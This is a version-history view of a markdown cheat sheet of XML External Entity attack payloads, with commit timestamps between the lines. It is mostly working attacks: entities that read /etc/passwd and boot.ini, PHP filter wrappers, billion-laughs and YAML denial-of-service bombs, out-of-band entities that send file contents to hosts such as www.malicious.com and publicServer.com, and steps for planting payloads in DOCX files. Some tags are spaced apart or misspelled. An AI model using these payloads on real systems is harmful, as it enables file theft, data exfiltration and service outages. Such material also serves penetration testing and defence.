2016-10-18 07:06:10 +00:00
# XML External Entity
2018-08-12 21:30:22 +00:00
2017-06-28 19:43:30 +00:00
An XML External Entity attack is a type of attack against an application that parses XML input
2016-10-18 08:01:56 +00:00
2016-10-18 07:06:10 +00:00
## Exploit
2016-10-18 08:01:56 +00:00
2016-10-30 11:53:32 +00:00
Basic Test
2018-08-12 21:30:22 +00:00
```xml
2016-10-30 11:53:32 +00:00
<!-- ?xml version="1.0" ? -->
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
< userInfo >
< firstName > John< / firstName >
< lastName > &example; < / lastName >
< / userInfo >
```
2017-12-06 19:40:29 +00:00
## Basic XXE
2018-08-12 21:30:22 +00:00
2016-10-18 07:06:10 +00:00
Classic XXE
2018-08-12 21:30:22 +00:00
```xml
2016-10-18 07:06:10 +00:00
<?xml version="1.0"?>
< !DOCTYPE data [
<!ELEMENT data (#ANY)>
2016-11-03 16:56:15 +00:00
<!ENTITY file SYSTEM "file:///etc/passwd">
2016-10-18 07:06:10 +00:00
]>
< data > &file; < / data >
2016-10-18 08:01:56 +00:00
```
2018-08-12 21:30:22 +00:00
```xml
2017-12-06 19:40:29 +00:00
<?xml version="1.0" encoding="ISO-8859-1"?>
< !DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>< foo > &xxe; < / foo >
```
2018-08-12 21:30:22 +00:00
```xml
2017-12-06 19:40:29 +00:00
<?xml version="1.0" encoding="ISO-8859-1"?>
< !DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" > ]>< foo > &xxe; < / foo >
```
2016-10-18 07:06:10 +00:00
Classic XXE Base64 encoded
2018-08-12 21:30:22 +00:00
```xml
2017-12-06 19:40:29 +00:00
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]>< foo / >
2016-10-18 07:06:10 +00:00
```
2017-12-06 19:40:29 +00:00
## PHP Wrapper inside XXE
2018-08-12 21:30:22 +00:00
```xml
2016-11-03 16:56:15 +00:00
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
< contacts >
< contact >
< name > Jean &xxe; Dupont< / name >
< phone > 00 11 22 33 44< / phone >
< adress > 42 rue du CTF< / adress >
< zipcode > 75000< / zipcode >
< city > Paris< / city >
< / contact >
2017-06-28 19:43:30 +00:00
< / contacts >
2016-11-03 16:56:15 +00:00
```
2018-08-12 21:30:22 +00:00
```xml
2017-12-06 19:40:29 +00:00
<?xml version="1.0" encoding="ISO-8859-1"?>
< !DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=http://10.0.0.3" >
]>
< foo > &xxe; < / foo >
```
2016-11-03 16:56:15 +00:00
2017-12-06 19:40:29 +00:00
## Deny of service
2018-08-12 21:30:22 +00:00
2016-10-18 07:06:10 +00:00
Deny Of Service - Billion Laugh Attack
2018-08-12 21:30:22 +00:00
```xml
2016-10-18 07:06:10 +00:00
< !DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
< data > &a4; < / data >
```
2017-12-06 19:40:29 +00:00
Yaml attack
2018-08-12 21:30:22 +00:00
```xml
2017-12-06 19:40:29 +00:00
a: & a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: & b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: & c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: & d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: & e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: & f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: & g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: & h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: & i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
2018-11-24 14:50:43 +00:00
## Blind XXE - Out of Band
2018-08-12 21:30:22 +00:00
2018-11-24 14:50:43 +00:00
### Blind XXE
2018-08-12 21:30:22 +00:00
```xml
2016-11-03 16:56:15 +00:00
<?xml version="1.0" encoding="ISO-8859-1"?>
< !DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]
>
< foo > &callhome; < / foo >
```
2018-11-24 14:50:43 +00:00
### XXE OOB Attack (Yunusov, 2013)
2018-08-12 21:30:22 +00:00
```xml
2016-10-18 07:06:10 +00:00
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
< data > &send; < / data >
File stored on http://publicServer.com/parameterEntity_oob.dtd
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'> ">
%all;
```
2018-11-24 14:50:43 +00:00
### XXE OOB with DTD and PHP filter
2018-08-12 21:30:22 +00:00
```xml
2017-06-28 19:43:30 +00:00
<?xml version="1.0" ?>
< !DOCTYPE r [
<!ELEMENT r ANY >
2018-02-23 12:48:51 +00:00
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
2017-06-28 19:43:30 +00:00
%sp;
%param1;
]>
< r > &exfil; < / r >
2018-02-23 12:48:51 +00:00
File stored on http://127.0.0.1/dtd.xml
2017-06-28 19:43:30 +00:00
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
2018-02-23 12:48:51 +00:00
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'> ">
2017-06-28 19:43:30 +00:00
```
2016-10-18 07:06:10 +00:00
2018-11-24 14:50:43 +00:00
### XXE Inside SOAP
2018-08-12 21:30:22 +00:00
```xml
2017-08-07 19:42:14 +00:00
< soap:Body > < foo > <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]> < / foo > < / soap:Body >
```
2018-11-24 14:50:43 +00:00
### XXE Inside DOCX file
Format of an Open XML file (inject the payload in any .xml file):
- /_rels/.rels
- [Content_Types].xml
- Default Main Document Part
- /word/document.xml
- /ppt/presentation.xml
- /xl/workbook.xml
Then update the file `zip -u xxe.docx [Content_Types].xml`
Tool : https://github.com/BuffaloWill/oxml_xxe
```xml
DOCX/XLSX/PPTX
ODT/ODG/ODP/ODS
SVG
XML
PDF (experimental)
JPG (experimental)
GIF (experimental)
```
2016-10-18 08:01:56 +00:00
## Thanks to
2018-08-12 21:30:22 +00:00
* [XML External Entity (XXE) Processing - OWASP ](https://www.owasp.org/index.php/XML_External_Entity_(XXE )_Processing)
* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka ](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html )
* [staaldraad - XXE payloads ](https://gist.github.com/staaldraad/01415b990939494879b4 )
* [mgeeky - XML attacks ](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870 )
2018-11-24 14:50:43 +00:00
* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST- 11/19/15 Will Vandevanter - @_will_is_ ](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf )
* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer) ](http://en.hackdig.com/08/28075.htm )